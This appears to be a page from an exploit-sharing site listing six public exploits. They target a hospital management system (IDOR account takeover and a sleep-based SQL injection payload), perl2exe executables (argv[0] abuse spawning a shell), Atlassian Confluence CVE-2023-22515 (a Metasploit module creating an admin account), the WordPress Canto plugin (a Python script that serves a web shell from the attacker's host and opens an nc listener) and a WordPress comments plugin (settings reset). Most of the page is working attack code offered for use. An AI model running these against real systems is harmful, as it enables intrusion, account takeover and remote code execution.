Latest exploits :: CodePwn

<pre><code># Exploit Title: Hospital Management System - IDOR + Accaunt Takeover # Google Dork: N/A # Application: Hospital Management System # Date: 27.02.2024 # Bugs: IDOR + Accaunt Takeover # Exploit Author: SoSPiro # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html # Version: 1.0 # Tested on: Windows 10 64 bit Wampserver # CVE : N/A ## Vulnerability Description: This report focuses on two vulnerabilities known as "Insecure Direct Object References (IDOR)" and "Account Takeover". These vulnerabilities occur in a scenario where user input and access privileges validation is inadequate. ## Proof of Concept (PoC): Target User Information: User 1: ID: 1 Email: patient@patient.com Password: patient ----------------------------------- User 2: ID: 4 Email: attack@ker Password: q1w2e3 ----------------------------------- User 1 Request POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1 Host: localhost Cookie: _ga=GA1.1.2080672900.1708952048; _gid=GA1.1.1833914840.1708952048; PHPSESSID=f6je8gcsm0h685mfr2g37ot8to ... id00=1&oldemail=patient%40patient.com&email=patient%40patient.com&name=Mrs.Sunita+Dighe&nic=422201&Tele=9090909091&address=India&password=patient&cpassword=patient User 2 Request POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1 Host: localhost Cookie: PHPSESSID=4c8per12a8freilu1upich92a4 ... id00=4&oldemail=attack%40ker&email=attack%40ker&name=attack+attacker&nic=123123123&Tele=0712345677&address=attac&password=q1w2e3&cpassword=q1w2e3 Attacker's Request The attacker aims to modify the account details of "patient 1" and sends the following HTTP request: POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1 Host: localhost Cookie: PHPSESSID=4c8per12a8freilu1upich92a4 ... id00=1&oldemail=patient%40patient.com&email=patient%40patient.com&name=MRRS.Sunita+Dighe&nic=422201&Tele=9090909091&address=attac&password=q1w2e3&cpassword=q1w2e3 In the above SQL queries, the $id value received from the user is directly included in the query and security checks are not performed. This allows exploiting another user's information. At the same time, since the user's identity is obtained from the POST data, the attacker can pass his identity as another user's identity. PoC video: https://www.youtube.com/watch?v=pmoBSnu9IYI ## Vulnerable code section: ==================================================== $sql1="update patient set pemail='$email',pname='$name',ppassword='$password',pnic='$nic',ptel='$tele',paddress='$address' where pid=$id ;"; $database->query($sql1); echo $sql1; $sql1="update webuser set email='$email' where email='$oldemail' ;"; $database->query($sql1); echo $sql1; ==================================================== ## Risks This security vulnerability exposes user information to unauthorized access and modifications. Consequently, there are potential risks such as account takeover, privacy breaches, and non-compliance with security policies, which can lead to substantial damage and security breaches in the system. </code></pre>

<pre><code># Exploit Title: Hospital Management System - SQL Injection # Google Dork: N/A # Application: Hospital Management System # Date: 26.02.2024 # Bugs: SQL Injection # Exploit Author: SoSPiro # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html # Version: 1.0 # Tested on: Windows 10 64 bit Wampserver # CVE : N/A ## Vulnerability Description: A security vulnerability has been identified in this web application due to the direct inclusion of user-input data into SQL queries, rendering it susceptible to SQL Injection attacks. This vulnerability may enable malicious actors to gain unauthorized access to sensitive information. ## Proof of Concept (PoC): Below is an example of an attack that a malicious actor could execute to exploit this vulnerability. POST /Vaidya%20Mitra/vm/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 80 Origin: http://localhost Connection: close Referer: http://localhost/Vaidya%20Mitra/vm/login.php Cookie: _ga=GA1.1.2080672900.1708952048; _gid=GA1.1.1833914840.1708952048; PHPSESSID=18a16tga7k2glh7 useremail=test@123.asd'%2b(select*from(select(sleep(5)))a)%2b'&userpassword=test In this example, the payload appended to the useremail parameter aims to execute a sleep function, intentionally delaying the server's response time. Real-world attacks could involve more malicious operations. Request - Response foto: https://i.imgur.com/LxENLBz.png ## Vulnerable code section: ==================================================== /Vaidya%20Mitra/vm/login.php $email = $_POST['useremail']; $password = $_POST['userpassword']; $result = $database->query("select * from webuser where email='$email'"); </code></pre>

<pre><code># Exploit Title: Executables Created with perl2exe <= V30.10C - Arbitrary Code Execution # Date: 10/17/2023 # Exploit Author: decrazyo # Vendor Homepage: https://www.indigostar.com/ # Software Link: https://www.indigostar.com/download/p2x-30.10-Linux-x64-5.30.1.tar.gz # Version: <= V30.10C # Tested on: Ubuntu 22.04 # Description: perl2exe packs perl scripts into native executables. Those executables use their 0th argument to locate a file to unpack and execute. Because of that, such executables can be made to execute another executable that has been compiled with perl2exe by controlling the 0th argument. That can be useful for breaking out of restricted shell environments. # Proof and Concept: user@testing:~/example$ ls p2x-30.10-Linux-x64-5.30.1.tar.gz perl2exe-Linux-x64-5.30.1 user@testing:~/example$ user@testing:~/example$ # Create and pack a "safe" perl script to target with the attack. user@testing:~/example$ echo 'print("I am completely safe\n");' > safe.pl user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe safe.pl Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software ... Generating safe user@testing:~/example$ user@testing:~/example$ # Check that the program executes as expected. user@testing:~/example$ ./safe I am completely safe user@testing:~/example$ user@testing:~/example$ # Create and pack a "malicious" script that we want to execute. user@testing:~/example$ echo 'print("j/k I am malicious AF\n");system("/bin/sh");' > malicious.pl user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe malicious.pl Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software ... Generating malicious user@testing:~/example$ user@testing:~/example$ # Our "malicious" file doesn't need to have execution permissions. user@testing:~/example$ chmod -x malicious user@testing:~/example$ ./malicious -bash: ./malicious: Permission denied user@testing:~/example$ user@testing:~/example$ # Execute the "safe" program with the name of the "malicious" program as the 0th argument. user@testing:~/example$ # The "safe" program will unpack and execute the "malicious" program instead of itself. user@testing:~/example$ bash -c 'exec -a malicious ./safe' j/k I am malicious AF $ pstree -s $$ systemd───sshd───sshd───sshd───bash───safe───sh───pstree $ </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control', 'Description' => %q{ This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass. A specially crafted request can be create new admin account without authentication on the target Atlassian server. }, 'Author' => [ 'Unknown', # exploited in the wild 'Emir Polat' # metasploit module ], 'References' => [ ['CVE', '2023-22515'], ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'], ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis'] ], 'DisclosureDate' => '2023-10-04', 'DefaultOptions' => { 'RPORT' => 8090 }, 'License' => MSF_LICENSE, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Base path', '/']), OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/), OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]), OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email]) ]) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/login.action') ) return Exploit::CheckCode::Unknown unless res return Exploit::CheckCode::Safe unless res.code == 200 poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/ confluence_version = Rex::Version.new(Regexp.last_match(1)) vprint_status("Detected Confluence version: #{confluence_version}") if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) || confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) || confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1')) return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}") end Exploit::CheckCode::Safe("Confluence version: #{confluence_version}") end def run res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/server-info.action'), 'vars_get' => { 'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false' } ) return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200 print_good('Found server-info.action! Trying to ignore setup.') created_user = create_admin_user res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'), 'headers' => { 'X-Atlassian-Token' => 'no-check' } ) return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200 create_credential({ workspace_id: myworkspace_id, origin_type: :service, module_fullname: fullname, username: datastore['NEW_USERNAME'], private_type: :password, private_data: datastore['NEW_PASSWORD'], service_name: 'Atlassian Confluence', address: datastore['RHOST'], port: datastore['RPORT'], protocol: 'tcp', status: Metasploit::Model::Login::Status::UNTRIED }) print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}") print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action") end def create_admin_user res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'), 'headers' => { 'X-Atlassian-Token' => 'no-check' }, 'vars_post' => { 'username' => datastore['NEW_USERNAME'], 'fullName' => 'New Admin', 'email' => datastore['NEW_EMAIL'], 'password' => datastore['NEW_PASSWORD'], 'confirm' => datastore['NEW_PASSWORD'], 'setup-next-button' => 'Next' } ) res&.code == 302 end end </code></pre>

<pre><code># Exploit Title: Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE) # Date: 04/11/2023 # Exploit Author: Leopoldo Angulo (leoanggal1) # Vendor Homepage: https://wordpress.org/plugins/canto/ # Software Link: https://downloads.wordpress.org/plugin/canto.3.0.4.zip # Version: All versions of Canto Plugin prior to 3.0.5 # Tested on: Ubuntu 22.04, Wordpress 6.3.2, Canto Plugin 3.0.4 # CVE : CVE-2023-3452 #PoC Notes: #The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. (Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-3452) #This code exploits the improper handling of the wp_abspath variable in the following line of the "download.php" code: #... require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ... #This is just an example but there is this same misconfiguration in other lines of the vulnerable plugin files. # More information in Leoanggal1's Github #!/usr/bin/python3 import argparse import http.server import socketserver import threading import requests import os import subprocess # Define the default web shell default_web_shell = "<?php system($_GET['cmd']); ?>" def create_admin_file(local_dir, local_shell=None): if not os.path.exists(local_dir): os.makedirs(local_dir) # If a local shell is provided, use it; otherwise, use the default web shell if local_shell: with open(f"{local_dir}/admin.php", "wb") as admin_file: with open(local_shell, "rb") as original_file: admin_file.write(original_file.read()) else: with open(f"{local_dir}/admin.php", "w") as admin_file: admin_file.write(default_web_shell) def start_local_server(local_port): Handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler) print(f"Local web server on port {local_port}...") httpd.serve_forever() return httpd def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port): local_dir = "wp-admin" create_admin_file(local_dir, local_shell) target_url = f"{url}/wp-content/plugins/canto/includes/lib/download.php" local_server = f"http://{local_host}:{local_port}" command = f"cmd={command}" if local_shell: # If a local shell is provided, start netcat on the specified port subprocess.Popen(["nc", "-lvp", str(nc_port)]) server_thread = threading.Thread(target=start_local_server, args=(local_port,)) server_thread.daemon = True server_thread.start() exploit_url = f"{target_url}?wp_abspath={local_server}&{command}" print(f"Exploitation URL: {exploit_url}") response = requests.get(exploit_url) print("Server response:") print(response.text) # Shutdown the local web server print("Shutting down local web server...") server_thread.join() if __name__ == "__main__": examples = ''' Examples: - Check the vulnerability python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 - Execute a command python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id' - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom. python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php ''' parser = argparse.ArgumentParser(description="Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452", epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument("-u", "--url", required=True, default=None, help="Vulnerable URL") parser.add_argument("-s", "--shell", help="Local file for web shell") parser.add_argument("-LHOST", "--local_host", required=True, help="Local web server IP") parser.add_argument("-LPORT", "--local_port", help="Local web server port") parser.add_argument("-c", "--command", default="whoami", help="Command to execute on the target") parser.add_argument("-NC_PORT", "--nc_port", type=int, help="Listener port for netcat") try: args = parser.parse_args() if args.local_port is None: args.local_port = 8080 # Valor predeterminado si LPORT no se proporciona exploit_rfi(args.url, args.shell, args.local_host, int(args.local_port), args.command, args.nc_port) except SystemExit: parser.print_help() </code></pre>

<pre><code># Exploit Title: POC-CVE-2023-3244 # Date: 9/12/2023 # Exploit Author: Diaa Hanna # Software Link: [download link if available] # Version: <= 1.2.0 comments-like-dislike # Tested on: 1.1.6 comments-like-dislike # CVE : CVE-2023-3244 #References #https://nvd.nist.gov/vuln/detail/CVE-2023-3244 #The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin. #This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users. #For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244). import requests import argparse import sys from colorama import Fore parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ') parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True) parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True) parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True) parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False) args=parser.parse_args() #check if the domain ends with a '/' if not then add it url=args.url if url[-1] != '/': url+='/' wp_login = f'{url}wp-login.php' wp_admin = f'{url}wp-admin/' username = args.username password = args.password session=requests.Session() #logging in session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In', 'redirect_to':wp_admin, 'testcookie':'1' },verify=not (args.nossl)) #if failed to login if len(session.cookies.get_dict()) == 2: print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again") sys.exit(1) #making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function #the restore_settings function does not check the sufficient privileges of a logged-in user #even a subscriber can use this POC response=session.get(f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action",verify=not (args.nossl)) if response.text == "Settings restored successfully.Redirecting...": print(Fore.GREEN +"exploited excuted successfully") print(Fore.YELLOW+ "settings of the comments-like-dislike plugin should be defaulted on the server") sys.exit(0) else: print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway") sys.exit(1) </code></pre>